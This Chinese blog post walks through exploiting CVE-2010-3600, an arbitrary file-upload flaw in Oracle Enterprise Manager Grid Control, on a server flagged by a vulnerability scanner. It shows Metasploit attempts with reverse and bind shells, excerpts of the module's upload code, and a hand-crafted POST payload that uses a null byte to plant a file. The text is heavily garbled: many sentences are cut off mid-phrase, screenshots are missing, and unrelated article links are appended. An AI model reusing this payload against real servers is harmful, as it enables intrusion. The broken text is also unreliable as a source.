禁止绿盟扫描oracle,Oracle Enterprise Manager Grid Control JSP代码执行漏洞(CVE-2010-3600)
*本文原创作者:一只胖麻瓜biu,本文属FreeBuf原创奖励计划,未经许可禁止转载
0×1
Oracle Enterprise Manager Grid Control在实现上存在
在上传
应用程序通过OCI的方式,访问
参考链接:
0×2
最近用绿盟扫描器扫到一个:
host:
访问存在漏洞的服务器:
msf中search此exp:
使用此exp:
发现失败了
show options查看一下payload:
此处为payload为reverse_tcp反向连接。
reverse_tcp反向连接(本机监听)//是服务器来连接攻击者,返回一个SHELL。
bind_tcp 正向连接 (目标监听) // 是攻击者主动连接服务器得到一个SHELL。
reverse_tcp 就是攻击者开启
考虑此处是否由于正反向连接问题,所以换成bind_tcp正向连接:
exp:
发现仍然失败
查找此漏洞披露平台(此为SCAP中文社区),查看此exp代码:
–ruby代码
代码主体为:
equire ‘msf/
class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Oracle Containers for J2EE/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info={})//对漏洞利用的说明
……
def on_new_
……
def upload_file(data)
……
def check
……
def exploit//进行远程代码执行
……
end
其中核心函数为exploit函数
发现其中关键函数upload_file:
def upload_file(data)
res = send_request_cgi(
{
‘uri’ => ‘d/em/ecm/csa/v10103/CSAr.
‘method’ => ‘POST’,
‘data’ => data
})
return res
end
最后返回的是res,推测res为上传的文件,其中uri是上传的页面,方法为POST,数据为data
先访问一下地址,查看是否存在该页面:
此处已判断该页面是一个可访问的空白页面
继续查看代码,def check函数:
data = "sessionID=#{file_name}.txt/x00.xml"
data << "/x0d/x0a"
data << Rex::Text.uri_encode(file_contents)
print_status("Uploading the CSA#{file_name}.txt file")
res = upload_file(data)
if not res or res.code != 200 or (res.body !~ /posted data was written to placeholder file/ and res.body !~ /csaPostStatus=0/)
print_error("The test file could not be uploaded")
print_status("Checking uploaded contents…")
res = send_request_raw({‘uri’ => "/em/CSA#{file_name}.txt"})
若上传成功,上传后的地址为x.x.x.x:1158/em/CSAhack.txt
此处说明只有csaPostStatus=0的时候才上传成功。
借助一下hackbar,此处构造的data数据:sessionID=hack.txt/x00.xml/x0d/x0ahack
发现页面返回csaPostStatus=5信息,根据代码说明只有csaPostStatus=0的时候才表示上传成功,
尝试一下转义:
页面返回csaPostStatus=0,访问一下上传页面:
空白页面,未成功
把/x换成%,再试一下:
/xhh表示两位的十六进制
/x00======NULL
/x0d======回车
/x0a======/r
重名报错了,说明上个步骤的hack.txt已经是上传成功了,换个名字试试:
然而页面还是访问不了-_-
到这才发现,忽略了很重要的东西,传输的方法必须是post
所以在bp中试一下,仍然需要将/x换成%:
再进行url的decode:
终于出来了flag,访问页面:
到这可以发现是已经上传成功了。
0×3
Oracle Da
第一次投稿,请大家指正。
*本文原创作者:一只胖麻瓜biu,本文属FreeBuf原创奖励计划,未经许可禁止转载
禁止绿盟扫描oracle,Oracle Enterprise Manager Grid Control JSP代码执行漏洞(CVE-2010-3600)相关推荐
- 使用 Oracle Enterprise Manager Cloud Control 12c 安装和管理 Oracle Data Guard
2019独角兽企业重金招聘Python工程师标准>>> 使用 Oracle Enterprise Manager Cloud Control 12c 安装和管理 Oracle Dat ...
- Splunk Enterprise远程代码执行漏洞(CVE-2022-43571)安全风险通告
奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 Splunk Enterprise是机器数据的引擎.使用Splunk可收集.索引和利用所有应用程序.服务器和设备生 ...
- Oracle Enterprise Manager Cloud Control最新文档合集
2019独角兽企业重金招聘Python工程师标准>>> Oracle Enterprise Manager Cloud Control最新文档合集 Oracle企业管理器系列产品为当 ...
- Oracle Enterprise Manager Cloud Control 13c部署文档
一.软件准备 名称 版本号 软件包 OS 7.6 CentOS Linux release 7.6.1810 (Core) Oracle Database 19c 19.3 LINUX.X64_193 ...
- Oracle Enterprise Manager Cloud Control 13c 配置——设置页面不失效
默认情况下Oracle Enterprise Manager Cloud Control 13c 数据库控件的会话超时为45分钟. 这意味着,如果HTTP客户机会话空闲45分钟或更长时间,它将断开 ...
- Oracle Enterprise Manager Cloud Control 13c 配置——Linux目标重定向(EMCC12c代理升级EMCC13c)
背景描述: 1,当前有一套EMCC12c的监控,最近规划将EMCC12c的监控迁移到EMCC13c的监控,原有的EMCC12c监控的目标端需要重新定向到EMCC13c 2,参考资料: (Redirec ...
- 【Oracle 19c】解决 Oracle EM(Enterprise Manager) Express 切换回旧版后无法访问的问题
文章目录 问题描述 解决方案 解决过程 1.按 Oracle EM Express 提示下载 Adobe Flash Player PPAPI 版 1.按 F12 查看 HTTP 请求头 2.找到问题 ...
- Enterprise Manager Cloud Control 安装
参考文件: https://docs.oracle.com/cd/cloud-control-13.3/index.htm 软件需求: 系统版本: Red Hat Enterprise Linux S ...
- 快速部署Enterprise Manager Cloud Control 12c(12.1) Agent
在<OEL 5上快速部署Enterprise Manager Cloud Control 12c(12.1)>中我介绍了如何安装配置Oracle Enterprise Manager Cl ...
- oracle11g远程命令执行漏洞,漏洞应急|Oracle Weblogic Server远程代码执行漏洞(CVE-2021-2109)...
近日,锐捷网络CERT安全应急响应团队关注到Oracle官方发布了2021年1月关键补丁更新公告,该补丁中修补了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多 ...
最新文章
- 整理一下这几天找到的一些好东西~
- 计算机应用基础教学实践活动,计算机应用基础与中职数学课程融合教学实践.doc...
- 企业网络推广——企业网络推广出于四大目的旨在做好网站营销
- Bochs安装FreeDOS与调试
- 函数调用基础概念原理
- python pyquery安装_win7下python安装pyquery
- 迭代器、生成器、递归、二分法
- Javascript实现鼠标框选元素后拖拽被框选的元素
- 云主机前景几何,风萧萧兮!
- 鼠标滑轮滚动到相应位置,对应位置的div触发一些效果实现方式
- vue前端项目上线配置
- android音视频焦点切换
- 嵌入式芯片调试神器-J-Link RTT详解
- Traceback (most recent call last):IndexError: list assignment index out of range
- android 豁免的广播及广播白名单,浅谈BLE地址、隐私机制、白名单、定向广播
- dell服务器T420装系统,ThinkPad T420笔记本一键u盘装系统win7教程
- 对计算机课的期待200字,谈《计算机应用》课程教学组织优化
- 关于POI设置打印区域 动态添加打印区域问题
- minitab画出主效应图并画出等值线图
- HarmonyOS初探03——DevEco Studio创建应用问题ERROR Unable to tunnel through proxy. Proxy returns HTTP1.1 403